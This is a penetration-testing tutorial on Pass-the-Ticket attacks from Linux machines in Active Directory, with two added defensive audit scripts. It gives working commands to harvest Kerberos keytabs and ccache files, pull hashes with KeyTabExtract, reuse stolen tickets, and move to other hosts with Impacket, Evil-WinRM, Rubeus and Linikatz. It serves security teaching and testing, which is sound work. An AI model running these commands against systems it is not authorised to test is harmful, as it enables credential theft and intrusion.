Pass the Ticket (PtT)

Pass-the-Ticket (PtT) is a post-exploitation technique in which an attacker uses a valid Kerberos ticket (such as a Ticket Granting Ticket, TGT) to authenticate to services without needing the user's password. This method exploits stolen tickets to bypass normal authentication mechanisms in Windows environments.

info

While traditionally a Windows feature, Linux computers can now join Active Directory domains, enabling centralized authentication and management. Tools like sssd, realmd, and Samba make this integration possible.

danger

Linux machines can use Kerberos tickets for authentication without joining Active Directory.

In Linux, Kerberos tickets can be harvested from:

  1. Credential cache (ccache) files in /tmp, named krb5cc_<UID> by default.
  2. The cache named by the KRB5CCNAME environment variable, if it is set.
  3. Keytab files (.keytab) holding long-term keys for stored credentials.

Checking if Linux Host is Domain Joined

Using realm

Use the realm command to check if the Linux host is domain joined.

realm list

Processes

If realm is unavailable, check for services like Winbind, SSSD, or LDAP as alternatives.

ps -ef | grep -i "winbind\|sssd"

id Command

If the Linux system is integrated with AD, the group memberships in the output will include a "domain users" group (with a high GID mapped from the domain).

id <USER>

nsswitch.conf File

The /etc/nsswitch.conf file configures sources and order for name-service information across various categories.

grep -i "sss\|winbind\|ldap" /etc/nsswitch.conf

system-auth

The system-auth file, part of PAM (Pluggable Authentication Modules), defines the common authentication stack that most service configurations include. If the system authenticates against AD via SSSD, Winbind, or LDAP, inspecting system-auth confirms the domain integration.

grep -i "pam_sss.so\|pam_winbind.so\|pam_ldap.so" /etc/pam.d/system-auth
# Or
grep -i "pam_sss.so\|pam_winbind.so\|pam_ldap.so" /etc/pam.d/system-auth-ac
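The checks above each inspect one file by eye. As an added example (not part of the original page), the following script parses the same two sources, nsswitch.conf and a PAM stack file, strips comments first so a commented-out backend is not counted, and reduces them to a single verdict. It assumes the default paths /etc/nsswitch.conf and /etc/pam.d/system-auth (falling back to Debian's /etc/pam.d/common-auth); the functions also accept arbitrary file paths so they can be run against copied configs.

```shell
#!/bin/sh
# Added example: summarise AD-integration indicators from the files the
# checks above inspect. Not from the original page; the /etc paths are the
# usual defaults, nothing else is assumed about the host.

# Print the passwd-database backends in an nsswitch.conf that point at a
# directory service (sss, winbind or ldap). Comments are stripped first so a
# commented-out "#passwd: files sss" line is not counted.
ad_nss_backends() {
    sed 's/#.*//' "$1" \
        | awk '$1 == "passwd:" { for (i = 2; i <= NF; i++) print $i }' \
        | grep -E '^(sss|winbind|ldap)$' || true
}

# Print the distinct AD-capable PAM modules referenced by a PAM stack file.
ad_pam_modules() {
    sed 's/#.*//' "$1" \
        | grep -oE 'pam_(sss|winbind|ldap)\.so' \
        | sort -u || true
}

# Verdict for one nsswitch.conf plus one PAM file: "integrated" when both
# name resolution and authentication go through a directory backend,
# "partial" when only one of them does, "local" otherwise.
ad_integration_verdict() {
    nss=$(ad_nss_backends "$1" | wc -l | tr -d ' ')
    pam=$(ad_pam_modules "$2" | wc -l | tr -d ' ')
    if [ "$nss" -gt 0 ] && [ "$pam" -gt 0 ]; then
        echo integrated
    elif [ "$nss" -gt 0 ] || [ "$pam" -gt 0 ]; then
        echo partial
    else
        echo local
    fi
}

# Stand-alone run against the live host (read-only).
if [ -r /etc/nsswitch.conf ]; then
    pamfile=/etc/pam.d/system-auth
    [ -r "$pamfile" ] || pamfile=/etc/pam.d/common-auth   # Debian-style name
    if [ -r "$pamfile" ]; then
        echo "nsswitch backends: $(ad_nss_backends /etc/nsswitch.conf | tr '\n' ' ')"
        echo "pam modules:       $(ad_pam_modules "$pamfile" | tr '\n' ' ')"
        echo "verdict:           $(ad_integration_verdict /etc/nsswitch.conf "$pamfile")"
    fi
fi
# realm, when installed, gives the authoritative answer; it is only consulted.
command -v realm >/dev/null 2>&1 && realm list
```

A "partial" verdict is worth a second look: a host that resolves domain users through sss but authenticates only with pam_unix.so usually has a half-finished join or a locally overridden PAM stack.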

Tickets Harvesting

Keytab Files

find / -name "*keytab*" -ls 2>/dev/null
crontab -l

If kinit appears in a cron job, the host is using Kerberos authentication, and the job's arguments usually reveal the keytab path and the principal it authenticates as.

ccache Files

To track down the ccache (credentials cache) file, we can simply check the value of the KRB5CCNAME environment variable.

env | grep -i krb5
# OR
echo $KRB5CCNAME

info

The KRB5CCNAME environment variable specifies the Kerberos credentials cache file location. By default, it’s stored in /tmp/ as krb5cc_<UID>.


Abusing KeyTab Files

# This will read information from the keytab file
klist -k -t FILE.keytab

The command above lists the principals stored in the keytab, which tells us which user the keytab belongs to. We can then use it to obtain a TGT as that user with kinit.

klist
# kinit is case-sensitive: the principal must match the keytab entry exactly
kinit jethalal@REZYDEV.XYZ -k -t jethalal.keytab
klist

info

We can try to list shared folder \\dc01\jethalal for confirmation.


Extracting the secrets from a keytab file

We can try to extract the hashes from the keytab file using the KeyTabExtract tool.

python3 keytabextract.py FILE.keytab

info

From the extracted hashes:

  • NTLM Hash: Can be used to perform a Pass-the-Hash attack.
  • AES256/AES128 Hash: Can be used to forge tickets with tools like Rubeus or crack the hashes to retrieve the plaintext password.

Abusing ccache Files

danger

Here all we need is read permission on the file.

First we will copy the ccache file and assign the file path to the KRB5CCNAME variable.

klist

# copy the ccache file using cp:
cp /tmp/krb5cc_<UID> .

# change environment variable to new dir
export KRB5CCNAME=/new/path/to/krb5cc_<UID>

klist
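The whole ccache technique above, and the keytab harvesting before it, depends on the credential file being readable by someone other than its owner. As an added example (not part of the original page), the following audit script is the defender's counterpart: it walks a directory for krb5cc_* caches and keytab files, reports those that are group- or world-readable, and flags crontab lines that invoke kinit so that scheduled keytab use can be reviewed. It assumes the default /tmp and /etc locations; the sample files in the usage are constructed.

```shell
#!/bin/sh
# Added example: audit Kerberos credential material on a Linux host for the
# exposure the sections above rely on. Not from the original page; /tmp and
# /etc are the usual defaults, everything else is constructed.

# Exit 0 when the file is readable by its group or by others (mode string
# from ls: position 5 is group read, position 8 is other read).
is_overexposed() {
    mode=$(ls -ld -- "$1" | cut -c1-10)
    case "$mode" in
        ????r*|???????r*) return 0 ;;
    esac
    return 1
}

# List krb5cc_* caches and keytab files under DIR (recursively) that are
# group- or world-readable, printed as "<mode> <path>", one per line.
audit_cred_dir() {
    find "$1" -type f \( -name 'krb5cc_*' -o -name '*keytab*' \) 2>/dev/null \
    | while IFS= read -r f; do
        if is_overexposed "$f"; then
            printf '%s %s\n' "$(ls -ld -- "$f" | cut -c1-10)" "$f"
        fi
    done
}

# Print crontab lines that call kinit, from the named file(s) or from stdin.
# Comments are stripped first so a commented-out job is not reported.
cron_kinit_refs() {
    cat "$@" | sed 's/#.*//' | grep -w 'kinit' || true
}

# Stand-alone run against the live host (read-only).
echo "== over-exposed credential files =="
audit_cred_dir /tmp
audit_cred_dir /etc
echo "== scheduled kinit jobs =="
crontab -l 2>/dev/null | cron_kinit_refs
[ -r /etc/crontab ] && cron_kinit_refs /etc/crontab
```

A ccache should be mode 600 and owned by the user it was issued to; a keytab should be 600 (or 640 to a dedicated group) and owned by the service that uses it. Any entry this script prints is a file that a local attacker could copy and reuse exactly as the section above describes, so the fix is the permission change rather than removing the file.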

Linux Attack Tools with Kerberos

Impacket

# Impacket with proxychains and Kerberos Authentication
proxychains python3 /opt/impacket/build/scripts-3.12/wmiexec.py rezydev.xyz -k

Evil-WinRM

proxychains evil-winrm -i 10.10.10.10 -r rezydev.xyz

Ticket Converter

To convert a ccache file to a kirbi file (or vice versa), you can use impacket-ticketConverter.

For example, to convert a ccache file to a kirbi file:

impacket-ticketConverter krb5cc_<UID> FILE.kirbi

We can use this converted ticket in rubeus like:

rubeus.exe ptt /ticket:C:\FILE.kirbi

Linikatz

Linikatz, developed by Cisco, is a Linux credential exploitation tool similar to Mimikatz for Active Directory integrations. It requires root access to extract credentials, including Kerberos tickets, from implementations like FreeIPA, SSSD, and Samba. Extracted credentials are saved in a "linikatz" folder in formats like ccache and keytabs for further use.

# Download the bash script with wget
wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh

# Change Permissions
chmod +x linikatz.sh

# Execute
./linikatz.sh